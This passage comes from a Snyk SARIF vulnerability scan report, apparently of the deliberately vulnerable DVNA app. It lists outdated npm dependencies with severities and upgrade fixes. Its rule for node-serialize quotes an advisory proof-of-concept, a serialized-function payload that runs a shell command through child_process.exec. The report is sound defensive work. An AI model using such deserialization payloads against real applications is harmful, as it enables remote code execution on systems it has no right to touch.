as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n# Remediation\nUpgrade `validator` to version 13.6.0 or higher.\n# References\n- [GitHub Issue](https://github.com/validatorjs/validator.js/issues/1597)\n- [GitHub PR](https://github.com/validatorjs/validator.js/pull/1651)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "npm" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "npm:node-serialize:20170208", + "shortDescription": { + "text": "Critical severity - Arbitrary Code Execution vulnerability in node-serialize" + }, + "fullDescription": { + "text": "(CVE-2017-5941) node-serialize@0.0.4" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: node-serialize\n* Introduced through: dvna@0.0.1 and node-serialize@0.0.4\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › node-serialize@0.0.4\n# Overview\r\n[`node-serialize`](https://www.npmjs.com/package/node-serialize) serializes an object and it's function into a JSON.\r\n\r\nAffected versions of this package are vulnerable to Arbitrary Code Execution when untrusted user-input is passed into the `unserialize()` function.\r\n\r\n**Example:**\r\n```js\r\nvar serialize = require('node-serialize');\r\nvar payload = '{\"rce\":\"_$$ND_FUNC$$_function (){require(\\'child_process\\').exec(\\'ls /\\', function(error, stdout, stderr) { console.log(stdout) });}()\"}';\r\nserialize.unserialize(payload);\r\n```\r\n\r\n# Remediation\r\nThere is no fix version for `node-serialize`\r\n\r\n# References\r\n- [Opsecx Blog](https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/)\r\n- [GitHub Issue](https://github.com/luin/serialize/issues/4)" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "npm" + ], + "cvssv3_baseScore": 9.8, + "security-severity": "9.8" + } + } + ] + } + }, + "results": [ + { + "ruleId": "SNYK-JS-ANSIREGEX-1583908", + "level": "error", + "message": { + "text": "This file introduces a vulnerable ansi-regex package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "ansi-regex@2.1.1" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to bcrypt@5.0.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "bcrypt@5.0.1" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-BCRYPT-572911", + "level": "error", + "message": { + "text": "This file introduces a vulnerable bcrypt package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "bcrypt@1.0.3" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to bcrypt@5.0.0" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "bcrypt@5.0.0" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-BCRYPT-575033", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable bcrypt package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "bcrypt@1.0.3" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to bcrypt@5.0.0" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "bcrypt@5.0.0" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-COOKIE-8163060", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable cookie package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "cookie@0.4.0" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-DICER-2311764", + "level": "error", + "message": { + "text": "This file introduces a vulnerable dicer package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "dicer@0.2.5" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to express-fileupload@1.4.0" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "express-fileupload@1.4.0" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-EJS-1049328", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable ejs package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "ejs@2.7.4" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to ejs@3.1.6" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "ejs@3.1.6" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-EJS-2803307", + "level": "error", + "message": { + "text": "This file introduces a vulnerable ejs package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "ejs@2.7.4" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to ejs@3.1.7" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "ejs@3.1.7" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-EJS-6689533", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable ejs package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "ejs@2.7.4" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to ejs@3.1.10" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "ejs@3.1.10" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-EXPRESSFILEUPLOAD-2635697", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable express-fileupload package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "express-fileupload@0.4.0" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-EXPRESSFILEUPLOAD-2635946", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable express-fileupload package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "express-fileupload@0.4.0" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-EXPRESSFILEUPLOAD-473997", + "level": "error", + "message": { + "text": "This file introduces a vulnerable express-fileupload package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "express-fileupload@0.4.0" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to express-fileupload@1.1.10" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "express-fileupload@1.1.10" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-EXPRESSFILEUPLOAD-595969", + "level": "error", + "message": { + "text": "This file introduces a vulnerable express-fileupload package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "express-fileupload@0.4.0" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to express-fileupload@1.1.10" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "express-fileupload@1.1.10" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-INFLIGHT-6095116", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable inflight package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "inflight@1.0.6" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to bcrypt@5.0.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "bcrypt@5.0.1" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-LIBXMLJS-6091649", + "level": "error", + "message": { + "text": "This file introduces a vulnerable libxmljs package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "libxmljs@0.19.10" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-LIBXMLJS-6807576", + "level": "error", + "message": { + "text": "This file introduces a vulnerable libxmljs package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "libxmljs@0.19.10" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-MATHJS-1016401", + "level": "error", + "message": { + "text": "This file introduces a vulnerable mathjs package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "mathjs@3.10.1" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to mathjs@7.5.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "mathjs@7.5.1" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "npm:mathjs:20170331", + "level": "error", + "message": { + "text": "This file introduces a vulnerable mathjs package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "mathjs@3.10.1" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to mathjs@3.10.3" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "mathjs@3.10.3" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "npm:mathjs:20170402", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable mathjs package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "mathjs@3.10.1" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to mathjs@3.11.5" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "mathjs@3.11.5" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "npm:mathjs:20170527", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable mathjs package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "mathjs@3.10.1" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to mathjs@3.13.3" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "mathjs@3.13.3" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "npm:mathjs:20171118", + "level": "error", + "message": { + "text": "This file introduces a vulnerable mathjs package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "mathjs@3.10.1" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to mathjs@3.17.0" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "mathjs@3.17.0" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "npm:mathjs:20171118-1", + "level": "error", + "message": { + "text": "This file introduces a vulnerable mathjs package with a critical severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "mathjs@3.10.1" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to mathjs@3.17.0" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "mathjs@3.17.0" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-MYSQL2-6591084", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable mysql2 package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "mysql2@1.7.0" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to mysql2@3.9.4" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "mysql2@3.9.4" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-MYSQL2-6591085", + "level": "error", + "message": { + "text": "This file introduces a vulnerable mysql2 package with a critical severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "mysql2@1.7.0" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to mysql2@3.9.4" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "mysql2@3.9.4" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-MYSQL2-6591300", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable mysql2 package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "mysql2@1.7.0" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to mysql2@3.9.3" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "mysql2@3.9.3" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-MYSQL2-6670046", + "level": "error", + "message": { + "text": "This file introduces a vulnerable mysql2 package with a critical severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "mysql2@1.7.0" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to mysql2@3.9.7" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "mysql2@3.9.7" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-MYSQL2-6861580", + "level": "error", + "message": { + "text": "This file introduces a vulnerable mysql2 package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "mysql2@1.7.0" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to mysql2@3.9.8" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "mysql2@3.9.8" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-PASSPORT-2840631", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable passport package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "passport@0.4.1" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to passport@0.6.0" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "passport@0.6.0" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-REQUEST-3361831", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable request package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "request@2.88.2" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to bcrypt@5.0.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "bcrypt@5.0.1" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-SEQUELIZE-2932027", + "level": "error", + "message": { + "text": "This file introduces a vulnerable sequelize package with a critical severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "sequelize@4.44.4" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to sequelize@6.19.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "sequelize@6.19.1" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-SEQUELIZE-2959225", + "level": "error", + "message": { + "text": "This file introduces a vulnerable sequelize package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "sequelize@4.44.4" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to sequelize@6.21.2" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "sequelize@6.21.2" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-SEQUELIZE-3324088", + "level": "error", + "message": { + "text": "This file introduces a vulnerable sequelize package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "sequelize@4.44.4" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to sequelize@6.29.0" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "sequelize@6.29.0" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-SEQUELIZE-3324089", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable sequelize package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "sequelize@4.44.4" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to sequelize@6.28.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "sequelize@6.28.1" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-SEQUELIZE-3324090", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable sequelize package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "sequelize@4.44.4" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to sequelize@6.28.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "sequelize@6.28.1" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-TAR-1536528", + "level": "error", + "message": { + "text": "This file introduces a vulnerable tar package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "tar@2.2.2" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to bcrypt@5.0.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "bcrypt@5.0.1" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-TAR-1536531", + "level": "error", + "message": { + "text": "This file introduces a vulnerable tar package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "tar@2.2.2" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to bcrypt@5.0.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "bcrypt@5.0.1" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-TAR-1536758", + "level": "note", + "message": { + "text": "This file introduces a vulnerable tar package with a low severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "tar@2.2.2" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to bcrypt@5.0.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "bcrypt@5.0.1" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-TAR-1579147", + "level": "error", + "message": { + "text": "This file introduces a vulnerable tar package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "tar@2.2.2" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to bcrypt@5.0.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "bcrypt@5.0.1" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-TAR-1579152", + "level": "error", + "message": { + "text": "This file introduces a vulnerable tar package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "tar@2.2.2" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to bcrypt@5.0.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "bcrypt@5.0.1" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-TAR-1579155", + "level": "error", + "message": { + "text": "This file introduces a vulnerable tar package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "tar@2.2.2" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to bcrypt@5.0.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "bcrypt@5.0.1" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-TAR-6476909", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable tar package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "tar@2.2.2" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to bcrypt@5.0.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "bcrypt@5.0.1" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-TOUGHCOOKIE-5672873", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable tough-cookie package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "tough-cookie@2.5.0" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to bcrypt@5.0.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "bcrypt@5.0.1" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-TYPEDFUNCTION-174139", + "level": "error", + "message": { + "text": "This file introduces a vulnerable typed-function package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "typed-function@0.10.5" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to mathjs@3.17.0" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "mathjs@3.17.0" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": 